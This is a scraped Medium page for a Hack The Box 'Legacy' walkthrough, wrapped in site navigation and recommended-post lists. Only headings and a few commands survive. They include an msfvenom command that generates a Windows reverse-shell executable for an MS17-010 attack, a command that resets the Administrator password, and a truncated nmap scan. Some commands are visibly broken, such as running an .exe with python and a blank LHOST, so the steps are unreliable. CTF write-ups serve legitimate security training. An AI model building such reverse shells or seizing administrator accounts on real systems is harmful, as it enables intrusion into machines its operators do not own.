HTB: Walkthrough without Metasploit. ~[LEGACY]

1. Scanning and Information gathering:-

2. Gaining Initial access and Exploitation

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
python ms17-010.exe
C:\> systeminfo

3. Going beyond the flags.

nmap -p3389
net user Administrator test




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to disable “Which device did you plug in?” notification on laptop

*FIBIT* will appear in *KGF 2* Hindi Movies and the advertisement will come up on *100 screens…

Situational Awareness: Cyber Threats Heightened by COVID-19 and How to Protect Against Them

BitTorrent Weekly Report|03.01–03.07

AI in cyber operations

Quantum computers and their threat to crypto

How to verify app signatures

The Blind Spot

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akash Pawar

Akash Pawar

More from Medium

Brute It | CTF | Write-Ups

HackTheBox — Paper write-up

Simple CTF TryHackMe Walkthrough

TryHackMe Vulnuniversity Writeup